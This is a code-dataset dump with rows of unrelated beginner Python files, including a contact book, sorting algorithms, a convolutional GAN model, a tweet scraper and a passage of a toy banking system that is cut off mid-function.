blob_id stringlengths 40 40 | language stringclasses 1 value | repo_name stringlengths 5 133 | path stringlengths 2 333 | src_encoding stringclasses 30 values | length_bytes int64 18 5.47M | score float64 2.52 5.81 | int_score int64 3 5 | detected_licenses listlengths 0 67 | license_type stringclasses 2 values | text stringlengths 12 5.47M | download_success bool 1 class |
|---|---|---|---|---|---|---|---|---|---|---|---|
ebaf1a3b8d691b0712f450da76b3726ccd345d9b | Python | Jelle12345/Python-3 | /oefeningen.py | UTF-8 | 2,238 | 3.640625 | 4 | [] | no_license | contacten = {}
def main():
menu()
keuze = input("Maak een keuze")
while keuze != 's':
if keuze == 'm':
nieuw_contact()
elif keuze == 't':
toon_contacten()
elif keuze == 'v':
verwijder_contact()
elif keuze == 'a':
contact_aanpassen()
elif keuze == 'o':
contact_opslaan()
menu()
keuze = input("Maak een keuze")
def menu():
print("m: maak nieuw contact")
print("t: toon je contactenlijst")
print("s: stop je programma")
print("v: verwijder contact")
print("a: contact aanpassen")
print("o: contact opslaan")
def toon_contacten():
print("-"*10)
print("Uw contacten: ")
print("-"*10)
print('\n'.join("{}: {}".format(k, v) for k, v in contacten.items()))
print("\n"*6)
def verwijder_contact():
verwijderen = input("noem het contact dat je wil verwijderen")
del contacten[verwijderen]
def nieuw_contact():
naam = input("geef een naam voor je contact")
nummer = input("geef het telefoonnummer van je contact")
print("dit is je contact " + naam + " " + nummer)
contacten[naam] = nummer
def contact_aanpassen():
print("-"*10)
print("Uw contacten: ")
print("-"*10)
print('\n'.join("{}: {}".format(k, v) for k, v in contacten.items()))
print("\n"*6)
aanpas = input("geef de naam van je contact dat je wil aanpassen")
if aanpas in contacten:
mobielnummer = input("geef je nieuwe telefoonnummer")
contacten[aanpas] = mobielnummer;
print("-" * 10)
print("Uw contacten: ")
print("-" * 10)
print('\n'.join("{}: {}".format(k, v) for k, v in contacten.items()))
print("\n" * 6)
def contact_opslaan():
for contact in contacten:
print("-" * 10)
print("Uw contacten: ")
print("-" * 10)
print('\n'.join("{}: {}".format(k, v) for k, v in contacten.items()))
print("\n" * 6)
with open("contact.txt","w+") as f:
contacten1 = "".join(contacten)
for contact in contacten:
f.write(contact + " " + contacten[contact] + "\n")
f.close()
print("je lijst is opgeslagen in contact.txt")
main() | true |
995fe5f30b068e5d137f3765243bb975d3b237ad | Python | imucici/my-learning-note | /LeetCode/week3/389. Find the Difference.py | UTF-8 | 325 | 3.15625 | 3 | [] | no_license | class Solution:
def findTheDifference(self, s: str, t: str) -> str:
counts = [0 for _ in range(26)]
for c in s:
counts[ord(c) - ord("a")] += 1
for c in t:
index = ord(c) - ord("a")
counts[index] -= 1
if counts[index] < 0:
return c
| true |
3f0509def5a7d68227d33ba015bf515b0ef835fe | Python | vbirdchong/LearnPython | /algorithm/bead_sort.py | UTF-8 | 600 | 3.171875 | 3 | [] | no_license | #!/usr/bin/env python
# coding:utf-8
try:
from itertools import zip_longest
except:
try:
from itertools import izip_longest as zip_longest
except:
zip_longest = lambda *args: map(None, *args)
def beadsort(l):
print l
# cl = columns([[1] * e for e in l])
# print "cl"
# print cl
# print "columns"
# print columns(cl)
# return map(len, cl)
return map(len, columns(columns([[1] * e for e in l])))
# return map(len, columns([[1] * e for e in l]))
def columns(l):
return [filter(None, x) for x in zip_longest(*l)]
# Demonstration code:
print(beadsort([5,3,1,7,4,1,1]))
| true |
46c93b1282fdf1752ff5018510408f2f5b1eafe9 | Python | pedro1hen1/treinamento | /lista_04/ex23.py | UTF-8 | 1,878 | 3.9375 | 4 | [] | no_license | # /bin/env python
# -*- encode: utf-8 -*-
__author__ = '@pedro1hen1'
# exercicio 23
"""Em uma competição de ginástica, cada atleta recebe votos de sete jurados.
A melhor e a pior nota são eliminadas. A sua nota fica sendo a média dos votos
restantes. Você deve fazer um programa que receba o nome do ginasta e as notas dos
sete jurados alcançadas pelo atleta em sua apresentação e depois informe a sua
média, conforme a descrição acima informada (retirar o melhor e o pior salto e
depois calcular a média com as notas restantes). As notas não são informados ordenadas.
Um exemplo de saída do programa deve ser conforme o exemplo abaixo:
"""
def ex23():
nome_atleta = True
n_atleta = 1
while nome_atleta != '':
saltos = []
print("\n" * 5)
print("Atleta n°", n_atleta)
nome_atleta = input("Digite o nome do atleta: ")
if nome_atleta == '':
break
else:
n_salto = 1
print("\n" * 3)
for i in range(5):
print("Salto n° ", n_salto)
distancia_salto = float(input("Digite a distancia do salto: "))
saltos.append(distancia_salto)
n_salto += 1
print("Atleta: ", nome_atleta)
n_salto = 1
count = 0
for i in range(5):
print(n_salto, "° salto : ", saltos[count], " m")
n_salto += 1
count += 1
print("Melhor salto: ", max(saltos), " m")
print("Pior salto: ", min(saltos), " m")
saltos.remove(max(saltos))
saltos.remove(min(saltos))
media = sum(saltos) / len(saltos)
print("Media dos demais saltos: ", round(media, 2))
print("Resultado Final: \n", nome_atleta, " : ", round(media, 2))
n_atleta += 1
ex23()
| true |
b04f9c82e133b0bf91c87258f06b5e6da4391154 | Python | Alexflames/water | /tppython/t21Grigoriev.py | UTF-8 | 4,482 | 3.5 | 4 | [] | no_license | # Классы: печатное издание, журнал, книга, учебник
class Paper:
def __init__(self, publisher, year, title):
self.publisher = publisher
self.year = year
self.title = title
class Magazine(Paper):
def __init__(self, publisher, year, title, number, month):
super().__init__(publisher, year, title)
self.number = number
self.month = month
class Book(Paper):
def __init__(self, publisher, year, title, topic, author, pages):
super().__init__(publisher, year, title)
self.topic = topic
self.author = author
self.pages = pages
class SchoolBook(Book):
def __init__(self, publisher, year, title, topic, author, pages,
purpose):
super().__init__(publisher, year, title, topic, author, pages)
self.purpose = purpose
paper = Paper('Саратовский мясокомбинат', 2019, 'Пособие по нарезке мяса')
magazine = Magazine('Саратовский мясокомбинат', 2019, 'Мясник недели',
444, 4)
book = Book('GreenPeace', 2019, 'The extreme danger of Saratov butchers',
'nature, society', 'J.K. Rowling', 500)
school_book = SchoolBook('неСГУ', 2015, 'Как разложить противника на ряд Фурье',
'самооборона', 'Вася Демидович', 15350,
'Студенты 3 курса факультета неКНИТ')
class Vector:
def __init__(self, comp):
self.comp = []
try:
for i in range(len(comp)):
icomp = float(comp[i])
self.comp.append(icomp)
except ValueError:
print("Вектор должен состоять из чисел а не строк!")
def __getitem__(self, key):
return self.comp[key]
def __setitem__(self, key, value):
self.comp[key] = value
def __eq__(self, other):
if len(self.comp) != len(other.comp):
print("Количество компонент векторов при сравнении не совпадает")
return Vector([])
for i in range(len(self.comp)):
if self[i] != other[i]:
return False
return True
def __ne__(self, other):
return not (self == other)
def __neg__(self):
return Vector(list(map(lambda x: -x, self.comp)))
def __add__(self, other):
if len(self.comp) != len(other.comp):
print("Количество компонент векторов при сложении не совпадает")
return Vector([])
new_vector = Vector([])
for i in range(len(self.comp)):
new_vector.comp.append(self[i] + other[i])
return new_vector
def __mul__(self, other):
if isinstance(other, int) or isinstance(other, float):
return Vector(list(map(lambda x: x * other, self.comp)))
else:
if len(self.comp) != len(other.comp):
print("Количество компонент векторов при умножении не совпадает")
return Vector([])
new_vector = Vector([])
for i in range(len(self.comp)):
new_vector.comp.append(self[i] * other[i])
return new_vector
def __str__(self):
s = "("
for comp in self.comp[:-1]:
s = s + str(comp) + ", "
return s + str(self.comp[-1]) + ")"
def norma(self):
s = 0
for x in self.comp:
s += x * x
return s ** (1/2)
def normalize(self):
s = 0.
for x in self.comp:
s += x
return Vector(list(map(lambda x: round(x / s, 2), self.comp)))
@staticmethod
def collinear(v1, v2):
return v1.normalize() == v2.normalize()
import t21graphGrigoriev as GGraph
v1 = Vector([3,4,5])
v2 = Vector([3,4,5])
print(v1 == v2)
v2[2] = 6
print(v1 == v2)
print(v1)
print(v1.norma())
print(v1.normalize())
v3 = Vector([6, 8, 10])
print(v3.normalize())
print(Vector.collinear(v1, v3))
print(v1 + v2)
print(v1 * v2)
print(v1 * 5)
print("-------------------------------------------")
print("--------------Работа с графами-------------")
print("-------------------------------------------")
GGraph.run_tests()
| true |
9d89a3e2538364646699ef4290ba12fa4e8c8dbe | Python | EhsanAghazadeh/pytorch-GAN-timeseries | /models/convolutional_models.py | UTF-8 | 5,584 | 2.96875 | 3 | [] | no_license | import torch
import torch.nn as nn
from torch.nn.utils import weight_norm
class Chomp1d(nn.Module):
def __init__(self, chomp_size):
super(Chomp1d, self).__init__()
self.chomp_size = chomp_size
def forward(self, x):
return x[:, :, :-self.chomp_size].contiguous()
class TemporalBlock(nn.Module):
def __init__(self, n_inputs, n_outputs, kernel_size, stride, dilation, padding, dropout=0.2):
super(TemporalBlock, self).__init__()
self.conv1 = weight_norm(nn.Conv1d(n_inputs, n_outputs, kernel_size,
stride=stride, padding=padding, dilation=dilation))
self.chomp1 = Chomp1d(padding)
self.relu1 = nn.ReLU()
self.dropout1 = nn.Dropout(dropout)
self.conv2 = weight_norm(nn.Conv1d(n_outputs, n_outputs, kernel_size,
stride=stride, padding=padding, dilation=dilation))
self.chomp2 = Chomp1d(padding)
self.relu2 = nn.ReLU()
self.dropout2 = nn.Dropout(dropout)
self.net = nn.Sequential(self.conv1, self.chomp1, self.relu1, self.dropout1,
self.conv2, self.chomp2, self.relu2, self.dropout2)
self.downsample = nn.Conv1d(n_inputs, n_outputs, 1) if n_inputs != n_outputs else None
self.relu = nn.ReLU()
self.init_weights()
def init_weights(self):
self.conv1.weight.data.normal_(0, 0.01)
self.conv2.weight.data.normal_(0, 0.01)
if self.downsample is not None:
self.downsample.weight.data.normal_(0, 0.01)
def forward(self, x):
out = self.net(x)
res = x if self.downsample is None else self.downsample(x)
return self.relu(out + res)
class TemporalConvNet(nn.Module):
def __init__(self, num_inputs, num_channels, kernel_size=2, dropout=0.2):
super(TemporalConvNet, self).__init__()
layers = []
num_levels = len(num_channels)
for i in range(num_levels):
dilation_size = 2 ** i
in_channels = num_inputs if i == 0 else num_channels[i-1]
out_channels = num_channels[i]
layers += [TemporalBlock(in_channels, out_channels, kernel_size, stride=1, dilation=dilation_size,
padding=(kernel_size-1) * dilation_size, dropout=dropout)]
self.network = nn.Sequential(*layers)
def forward(self, x):
return self.network(x)
class TCN(nn.Module):
def __init__(self, input_size, output_size, num_channels, kernel_size, dropout):
super(TCN, self).__init__()
self.tcn = TemporalConvNet(input_size, num_channels, kernel_size=kernel_size, dropout=dropout)
self.linear = nn.Linear(num_channels[-1], output_size)
self.init_weights()
def init_weights(self):
self.linear.weight.data.normal_(0, 0.01)
def forward(self, x, channel_last=True):
#If channel_last, the expected format is (batch_size, seq_len, features)
y1 = self.tcn(x.transpose(1, 2) if channel_last else x)
return self.linear(y1.transpose(1, 2))
class CausalConvDiscriminator(nn.Module):
"""Discriminator using casual dilated convolution, outputs a probability for each time step
Args:
input_size (int): dimensionality (channels) of the input
n_layers (int): number of hidden layers
n_channels (int): number of channels in the hidden layers (it's always the same)
kernel_size (int): kernel size in all the layers
dropout: (float in [0-1]): dropout rate
Input: (batch_size, seq_len, input_size)
Output: (batch_size, seq_len, 1)
"""
def __init__(self, input_size, n_layers, n_channel, kernel_size, dropout=0):
super().__init__()
#Assuming same number of channels layerwise
num_channels = [n_channel] * n_layers
self.tcn = TCN(input_size, 1, num_channels, kernel_size, dropout)
def forward(self, x, channel_last=True):
return torch.sigmoid(self.tcn(x, channel_last))
class CausalConvGenerator(nn.Module):
"""Generator using casual dilated convolution, expecting a noise vector for each timestep as input
Args:
noise_size (int): dimensionality (channels) of the input noise
output_size (int): dimenstionality (channels) of the output sequence
n_layers (int): number of hidden layers
n_channels (int): number of channels in the hidden layers (it's always the same)
kernel_size (int): kernel size in all the layers
dropout: (float in [0-1]): dropout rate
Input: (batch_size, seq_len, input_size)
Output: (batch_size, seq_len, outputsize)
"""
def __init__(self, noise_size, output_size, n_layers, n_channel, kernel_size, dropout=0):
super().__init__()
num_channels = [n_channel] * n_layers
self.tcn = TCN(noise_size, output_size, num_channels, kernel_size, dropout)
def forward(self, x, channel_last=True):
return torch.tanh(self.tcn(x, channel_last))
if __name__ == "__main__":
#30-dimensional noise
input = torch.randn(8, 32, 30)
gen = CausalConvGenerator(noise_size=30, output_size=1, n_layers=8, n_channel=10, kernel_size=8, dropout=0)
dis = CausalConvDiscriminator(input_size=1, n_layers=8, n_channel=10, kernel_size=8, dropout=0)
print("Input shape:", input.size())
fake = gen(input)
print("Generator output shape:", fake.size())
dis_out = dis(fake)
print("Discriminator output shape:", dis_out.size())
| true |
a430fb678de1c63cecdc68c7ae4a49958d466297 | Python | miracode/data-structures | /insertion_sort.py | UTF-8 | 1,273 | 4.5625 | 5 | [
"MIT"
] | permissive |
def insertion_sort(array):
"""
Sort an input array with insertion sort algorithm
The insertion sort algorithm compares an element with the preceeding
ordered element to determine whether the two should be swapped. This will
continue until the preceeding element is no longer greater than the
current element.
Best case scenario: O(n)
- Best case, if an array is already sorted, this algorithm will inspect
every element of the list once to verify it is sorted, no swaps required.
Worst case scenario: O(n^2)
- Worst case, if an array is reversely sorted, each element must be
compared and swapped with every element preceeding it until it reaches
the beginning.
"""
for elem in range(len(array)):
curr = elem
while curr > 0 and array[curr - 1] > array[curr]:
# swap values
array[curr - 1], array[curr] = array[curr], array[curr - 1]
curr -= 1
return array
if __name__ == '__main__':
print insertion_sort.func_doc
array1 = [3, 2, 1]
assert insertion_sort(array1) == [1, 2, 3]
array2 = [1, 2, 3, 5, 4]
assert insertion_sort(array2) == [1, 2, 3, 4, 5]
array3 = range(100, 0, -1)
assert insertion_sort(array3) == range(1, 101)
| true |
401d07729a699f58064b9ae121c9231df3b66b38 | Python | arkavo/Maxwell-ecosystem | /tests/charge_core.py | UTF-8 | 2,361 | 2.59375 | 3 | [
"Apache-2.0"
] | permissive | import numpy as np
import numba
from numba import cuda
from vectors import*
@cuda.jit
def add_field(r,q,space):
tx = cuda.threadIdx.x
ty = cuda.threadIdx.y
bw = cuda.blockDim.x
pos = int(tx + ty*bw)
dist2 = 0.0
for i in range(2):
dist2 += (r[i] - (tx*i+ty*(1-i)))**2
dist2 = dist2**0.5
if pos < space.size:
if dist2 == 0:
space[tx,ty] += 0.0
else:
space[tx,ty] += 1 * q /(dist2)**2
class charge:
def __init__(self,q,r,v):
self.charge = q
self.position = r
self.velocity = v
def add_field(self,space):
dim = space.order
if dim==2:
for i in range((space.shape)[0]):
for j in range((space.shape)[1]):
if int(distance(np.array([i,j]),np.array(self.position)))==0:
(space.content)[i][j] += 0
else:
(space.content)[i][j] += 1 * self.charge / (distance(np.array([i,j]),self.position)**2)
def add_potential(self,space):
dim = space.order
if dim==2:
for i in range((space.shape)[0]):
for j in range((space.shape)[1]):
if distance(np.array([i,j]),self.position)==0:
(space.content)[i][j] += 0
else:
(space.content)[i][j] += 1 * self.charge / distance(np.array([i,j]),self.position)
class charge_line:
def __init__(self,Q,st,en,V=0,T=0):
self.charge = Q
self.st_pt = st
self.en_pt = en
self.velocity = V
self.rotate = T
self.path = draw_line(st,en)
def add_line_field(self,space):
for i in range(len(self.path)):
r = self.path[i]
q_c = charge(self.charge,r,self.velocity)
q_c.add_field(space)
print(str(int(i/len(self.path)*100))+"% done",end="\r")
class charge_circle:
def __init__(self,Q,pt,r,en_=1,st_=0,V=0,T=0):
self.charge = Q
self.center = pt
self.radius = r
self.velocity = V
self.rotate = T
self.path = draw_circle(pt,r,en=en_,st=st_)
def add_circle_field(self,space):
for i in prange(self.path):
q_c = charge(self.charge,i,self.velocity)
q_c.add_field(space)
| true |
1b0e4495d095bf77067c6c9e49b866aeec39892d | Python | zolfaShefreie/carpet_factory | /factory_info_action.py | UTF-8 | 12,417 | 2.890625 | 3 | [] | no_license | import address_graph
import math
class info_func:
picture_matrix=[]
result_grath_coloring=[]
min_list_coloring=[]
address=address_graph.address_graph()
def __init__(self):
pass
def default_matrix_multiplication(self,a, b):
new_matrix = [[a[0][0] * b[0][0] + a[0][1] * b[1][0], a[0][0] * b[0][1] + a[0][1] * b[1][1]],[a[1][0] * b[0][0] + a[1][1] * b[1][0], a[1][0] * b[0][1] + a[1][1] * b[1][1]]]
return new_matrix
def matrix_addition(self,matrix_a, matrix_b):
return [[matrix_a[row][col] + matrix_b[row][col]for col in range(len(matrix_a[row]))] for row in range(len(matrix_a))]
def matrix_subtraction(self,matrix_a, matrix_b):
return [[matrix_a[row][col] - matrix_b[row][col]for col in range(len(matrix_a[row]))] for row in range(len(matrix_a))]
def split_matrix(self,a):
matrix_length = len(a)
mid = matrix_length // 2
top_left = [[a[i][j] for j in range(mid)] for i in range(mid)]
bot_left = [[a[i][j] for j in range(mid)] for i in range(mid, matrix_length)]
top_right = [[a[i][j] for j in range(mid, matrix_length)] for i in range(mid)]
bot_right = [[a[i][j] for j in range(mid, matrix_length)] for i in range(mid, matrix_length)]
return top_left, top_right, bot_left, bot_right
def get_matrix_dimensions(self,matrix):
return len(matrix), len(matrix[0])
def strassen(self,matrix_a,matrix_b):
if self.get_matrix_dimensions(matrix_a) == (2, 2):
return self.default_matrix_multiplication(matrix_a, matrix_b)
A, B, C, D = self.split_matrix(matrix_a)
E, F, G, H = self.split_matrix(matrix_b)
p1 = self.strassen(A, self.matrix_subtraction(F, H))
p2 = self.strassen(self.matrix_addition(A, B), H)
p3 = self.strassen(self.matrix_addition(C, D), E)
p4 = self.strassen(D, self.matrix_subtraction(G, E))
p5 = self.strassen(self.matrix_addition(A, D), self.matrix_addition(E, H))
p6 = self.strassen(self.matrix_subtraction(B, D), self.matrix_addition(G, H))
p7 = self.strassen(self.matrix_subtraction(A, C), self.matrix_addition(E, F))
top_left = self.matrix_addition(self.matrix_subtraction(self.matrix_addition(p5, p4), p2), p6)
top_right = self.matrix_addition(p1, p2)
bot_left = self.matrix_addition(p3, p4)
bot_right = self.matrix_subtraction(self.matrix_subtraction(self.matrix_addition(p1, p5), p3), p7)
new_matrix = []
for i in range(len(top_right)):
new_matrix.append(top_left[i] + top_right[i])
for i in range(len(bot_right)):
new_matrix.append(bot_left[i] + bot_right[i])
return new_matrix
# def default_matrix_multiplication(self,matrix_a,matrix_b):# if the matices are 2*2
# matrix_c=[] #c: the result of 'a' and 'b' multiplication
# matrix_c.append([])
# matrix_c.append([])
# matrix_c[0].append(matrix_a[0][0]*matrix_b[0][0]+matrix_a[0][1]*matrix_b[1][0])
# matrix_c[0].append(matrix_a[0][0]*matrix_b[0][1]+matrix_a[0][1]*matrix_b[1][1])
# matrix_c[1].append(matrix_a[1][0]*matrix_b[0][0]+matrix_a[1][1]*matrix_b[1][0])
# matrix_c[1].append(matrix_a[1][0]*matrix_b[0][1]+matrix_a[1][1]*matrix_b[1][1])
# return matrix_c
# def add(self,matrix_a,matrix_b): #addition of two matrices
# matrix_c=[]
# for i in range(0,len(matrix_a)):
# matrix_c.append([])
# for i in range(0,len(matrix_a)):
# for j in range(0,len(matrix_a)):
# matrix_c[i].append(matrix_a[i][j]+matrix_b[i][j])
# return matrix_c
# def sub(self,matrix_a,matrix_b): # subtraction of two matrices
# matrix_c=[]
# for i in range(0,len(matrix_a)):
# matrix_c.append([])
# for i in range(0,len(matrix_a)):
# for j in range(0,len(matrix_a)):
# matrix_c.append(matrix_a[i][j]-matrix_b[i][j])
# return matrix_c
# def split_matrix(self, matrix_a): #divide the matrix into four submatrices
# mid=len(matrix_a)//2
# c1=[]
# for i in range(0,mid):
# c1.append([])
# for j in range(0,mid):
# c1[i].append(matrix_a[i][j])
# c2=[]
# k=0
# for i in range(mid,len(matrix_a)):
# c2.append([])
# for j in range(0,mid):
# c2[k].append(matrix_a[i][j])
# k+=1
# c3=[]
# k=0
# for i in range(0,mid):
# c3.append([])
# for j in range(mid,len(matrix_a)):
# c3[k].append(matrix_a[i][j])
# k+=1
# c4=[]
# k=0
# for i in range(mid,len(matrix_a)):
# c4.append([])
# for j in range(mid,len(matrix_a)):
# c4[k].append(matrix_a[i][j])
# k+=1
# return c1,c3,c2,c4
# def strassen(self,matrix_a,matrix_b):
# if len(matrix_a)==2:
# return info_func.default_matrix_multiplication(matrix_a,matrix_b)
# A, B, C, D = info_func.split_matrix(matrix_a)
# E, F, G, H = info_func.split_matrix(matrix_b)
# p1 = info_func.strassen(A, info_func.sub(F, H))
# p2 = info_func.strassen(info_func.add(A, B), H)
# p3 = info_func.strassen(info_func.add(C, D), E)
# p4 = info_func.strassen(D, info_func.sub(G, E))
# p5 = info_func.strassen(info_func.add(A, D), info_func.add(E, H))
# p6 = info_func.strassen(info_func.sub(B, D), info_func.add(G, H))
# p7 = info_func.strassen(info_func.sub(A, C), info_func.add(E, F))
# top_left = info_func.add(info_func.sub(info_func.add(p5, p4), p2), p6)
# top_right = info_func.add(p1, p2)
# bot_left = info_func.add(p3, p4)
# bot_right = info_func.sub(info_func.sub(info_func.add(p1, p5), p3), p7)
# # construct the new matrix from our 4 quadrants
# new_matrix = []
# for i in range(len(top_right)):
# new_matrix.append(top_left[i] + top_right[i])
# for i in range(len(bot_right)):
# new_matrix.append(bot_left[i] + bot_right[i])
# return new_matrix
# def strassen_multiplication(self,matrix_b): #matrix_b is the matrix that user inters
# matrix_a=info_func.picture_matrix #matrix_a is the picture_matrix
# a_rows=len(matrix_a) # number of rows of picture_matrix
# a_columns=len(matrix_a[0]) #number of columns of picture_matrix
# #the dimensions of picture_matrix must be a number of power 2
# if a_rows>a_columns:
# if isinstance(math.log(a_rows,2),float)==True:
# n=math.ceil(math.log(a_rows,2)) #the nearest power of 2 to the current dimension
# for i in range(0,a_rows):
# for j in range(a_columns,2**n):
# matrix_a[i].append(0)
# for i in range(a_rows,2**n):
# matrix_a.append([])
# for j in range(0,2**n):
# matrix_a[i].append(0)
# else:
# n=math.log(a_rows,2)
# for i in range(0,a_rows):
# for j in range(a_columns,2**n):
# matrix_a[i].append(0)
# else:
# if isinstance(math.log(a_columns,2),float)==True:
# n=math.ceil(math.log(a_columns,2))
# for i in range(0,a_rows):
# for j in range(a_columns,2**n):
# matrix_a[i].append(0)
# for i in range(a_rows,2**n):
# matrix_a.append([])
# for j in range(0,2**n):
# matrix_a[i].append(0)
# else:
# n=math.log(a_columns,2)
# for i in range(a_rows,2**n):
# matrix_a.append([])
# for j in range(0,2**n):
# matrix_a[i].append(0)
# b_rows=len(matrix_b)
# b_columns=len(matrix_b[0])
# if b_rows<len(matrix_a) and b_columns<len(matrix_a):
# for i in range(b_rows,len(matrix_a)):
# matrix_b.append([])
# for j in range(0,len(matrix_a)):
# matrix_b[i].append(0)
# for i in range(0,b_rows):
# for j in range(b_columns,len(matrix_a)):
# matrix_b[i].append(0)
# if b_rows>len(matrix_a) and b_columns>len(matrix_a):
# for i in range(len(matrix_a),b_rows):
# matrix_b.pop()
# for i in range(0,len(matrix_a)):
# for j in range(len(matrix_a),b_columns):
# matrix_b[i].pop()
# if b_rows<len(matrix_a) and b_columns>len(matrix_a):
# for i in range(0,b_rows):
# for j in range(len(matrix_a),b_columns):
# matrix_b[i].pop()
# for i in range(b_rows,len(matrix_a)):
# matrix_b.append([])
# for j in range(0,len(matrix_a)):
# matrix_b[i].append(0)
# if b_rows>len(matrix_a) and b_columns<len(matrix_a):
# for i in range(len(matrix_a),b_rows):
# matrix_b.pop()
# for i in range(0,len(matrix_a)):
# for j in range(b_columns,len(matrix_a)):
# matrix_b[i].append(0)
# if b_rows>len(matrix_a) and b_columns==len(matrix_a):
# for i in range(len(matrix_a),b_rows):
# matrix_b.pop()
# if b_rows<len(matrix_a) and b_columns==len(matrix_a):
# for i in range(b_rows,len(matrix_a)):
# matrix_b.append([])
# for j in range(0,len(matrix_a)):
# matrix_b[i].append(0)
# if b_columns<len(matrix_a) and b_rows==len(matrix_a):
# for i in range(0,len(matrix_a)):
# for j in range(b_columns,len(matrix_a)):
# matrix_b[i].append(0)
# if b_columns>len(matrix_a) and b_rows==len(matrix_a):
# for i in range(0,len(matrix_a)):
# for j in range(len(matrix_a),b_columns):
# matrix_b[i].pop()
# return info_func.strassen(matrix_a,matrix_b)
def first_input(self,n):
colors=[]
for i in range(0,n):
colors.append(0)
return colors
def first_input(self,n):
colors=[]
for i in range(0,n):
colors.append(0)
return colors
def promising(self,counts=0,colors=[],edges=[]):
switch = True
j = 0
while j < counts and switch:
if edges[counts][j]==1 and colors[counts] == colors[j]:
switch=False
j+=1
return switch
def grath_coloring(self,i=-1,colors=[],edges=[],num_of_color=1):
if self.promising (i,colors,edges):
if i == num_of_color-1:
self.result_grath_coloring.append([x for x in colors])
else:
for color in range(1,num_of_color+1):
colors[i + 1] = color
self.grath_coloring(i + 1,colors,edges,num_of_color)
def min_color(self,num_of_color=1):
# find min of max every result
min = num_of_color
for each in self.result_grath_coloring:
max_each=max(each)
if max_each < min:
min = max_each
self.min_list_coloring=each
return min
| true |
444499766a3f4a77f919a1bf36eab79e0e649561 | Python | abhesrivas/code-mixed-embeddings | /CMEmbeddings/scraper/demo.py | UTF-8 | 1,788 | 3 | 3 | [] | no_license | from scraper import AdvancedSearchScraper
import sys
import string
import re
def is_ascii(s):
return all(ord(c) < 128 for c in s)
def scrape_tweets(word, count, start, end):
if(start==0 and end==0):
name = "scraped/"+word+".txt"
ass = AdvancedSearchScraper(word, count)
tweets = ass.scrape()
with open(name, 'w') as f:
for tweet in tweets:
text = tweet['tweet_text']
t_id = tweet['tweet_id']
language = tweet['tweet_language']
text = re.sub(r"http\S+", "", text)
text = text.translate(str.maketrans('','',string.punctuation))
text = text.lower()
text = text.translate(str.maketrans('','','1234567890'))
if((is_ascii(text)) and (language=='en')):
f.write(str(t_id)+","+text+"\n")
else:
words = open("data/frequent_set_words.txt").read().split('\n')
words = list(sorted(set(words)))
name = "scraped/"+words[start]+"_to_"+words[end-1]+".txt"
print(name)
for i in range(start, end):
word = words[i]
ass = AdvancedSearchScraper(word, count)
tweets = ass.scrape()
print("Done for "+str(i)+" "+words[i])
with open(name, 'a+') as f:
for tweet in tweets:
text = tweet['tweet_text']
t_id = tweet['tweet_id']
language = tweet['tweet_language']
text = re.sub(r"http\S+", "", text)
text = text.translate(str.maketrans('','',string.punctuation))
text = text.lower()
text = text.translate(str.maketrans('','','1234567890'))
if(is_ascii(text)):
f.write(str(t_id)+","+text+"\n")
word = sys.argv[1]
count = int(sys.argv[2])
start = int(sys.argv[3])
end = int(sys.argv[4])
try:
scrape_tweets(word, count, start, end)
except Exception as e:
print("exception:")
print(e)
print("Done!")
| true |
6c9d65ffb0273803ba8cb449977c44a76346ff72 | Python | rdeyanski/BestBank | /Bank/Functions.py | UTF-8 | 52,206 | 2.921875 | 3 | [] | no_license | import pickle
import matplotlib.pyplot as plt
import numpy as np
from datetime import datetime
from Bank.Acc_Classes import DepositAccount, CreditAccount, MortgageAccount
from Bank.Transactions import Deposit, Withdraw
from Bank.Updates import UserUpdate, AccountUpdate, TransferUpdate
from Bank.User_Classes import Company, Person, Admin, Employee, Staff
with open('users_inventory', 'rb') as users_inventory_file:
users_inventory = pickle.load(users_inventory_file)
with open('accounts_inventory', 'rb') as accounts_inventory_file:
accounts_inventory = pickle.load(accounts_inventory_file)
with open('transactions_inventory', 'rb') as transactions_inventory_file:
transactions_inventory = pickle.load(transactions_inventory_file)
with open('updates_inventory', 'rb') as updates_inventory_file:
updates_inventory = pickle.load(updates_inventory_file)
def current_time():
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y %H:%M:%S")
print(dt_string, '\n')
def welcome():
""" Greets the user and gives options to enter the system """
print('\n', '=' * 41, '\n|',
' Welcome in BestBank Online System! '
'|\n|', '*' * 40, '|\n|', ' ' * 40, '|',
'\n| 1. Login.', ' ' * 30, '|',
'\n| 2. Register (new user).', ' ' * 16, '|',
'\n| 3. Interest Calculator.', ' ' * 16, '|'
'\n| 4. Quit.', ' ' * 31, '|',
'\n|', ' ' * 40, '|',
'\n| Please, enter one of the options above: |',
'\n|', '-' * 40, '|')
def register():
""" Registers new user in the system """
# users_inventory = []
# updates_inventory = []
now = datetime.now()
dt_string = now.strftime("%d/%m/%Y at %H:%M:%S")
first_name = input('\nEnter first name:\t')
last_name = input('Enter last name:\t')
phone = input('Enter your phone number:\t')
email = input('Enter your email address:\t')
new_password = input('Enter your password:\t')
re_password = input('Repeat your password:\t')
while new_password != re_password:
print('Repeat incorrect! Please enter and re-enter your password:\t')
command1 = input()
command2 = input()
if command1 == command2:
new_password = re_password = command2
password = new_password
mark1 = email
mark2 = password[-5::]
if mark1.split('@')[1] == 'bestbank.eu':
title = input('\nEnter your title:\t')
admin_id = input('\nEnter your ID:\t')
if mark2 == 'admin':
users_inventory.append(Admin(first_name, last_name, phone, email, password, title, admin_id))
elif mark2 == 'staff':
empl_id = admin_id
users_inventory.append(Employee(first_name, last_name, phone, email, password, title, empl_id))
else:
print('\n', '=' * 38,
'\nInvalid Registration!'
'\nPlease, try again, or contact us in person.'
f'\nThank you!\n{dt_string}', '-' * 38)
pass
user_name = first_name + last_name
old_detail = 'Staff'
new_detail = password
date_time = dt_string
updates_inventory.append(UserUpdate(user_name, old_detail, new_detail, date_time))
print(f'\nCongratulations, {first_name} {last_name}!,\n'
f'You successfully joined Best Bank Team as {title}.')
with open('users_inventory', 'wb') as users_inventory_file:
pickle.dump(users_inventory, users_inventory_file)
with open('updates_inventory', 'wb') as updates_inventory_file:
pickle.dump(updates_inventory, updates_inventory_file)
else:
command = input('\nWhat type of online banking you register?'
'\n1. Business.'
'\n2. Personal.'
'\nPlease, enter one of the options above:\t')
type = None
if command == '1':
customer_id = input('Enter your company ID:\t')
company_name = input('Enter company name:\t')
users_inventory.append(Company(first_name, last_name, phone, email, password, customer_id, company_name))
type = 'Business'
if command == '2':
customer_id = input('Enter your personal ID:\t')
address = input('Enter postal address:\t')
users_inventory.append(Person(first_name, last_name, phone, email, password, customer_id, address))
type = 'Personal'
user_name = first_name + last_name
old_detail = type
new_detail = password
date_time = dt_string
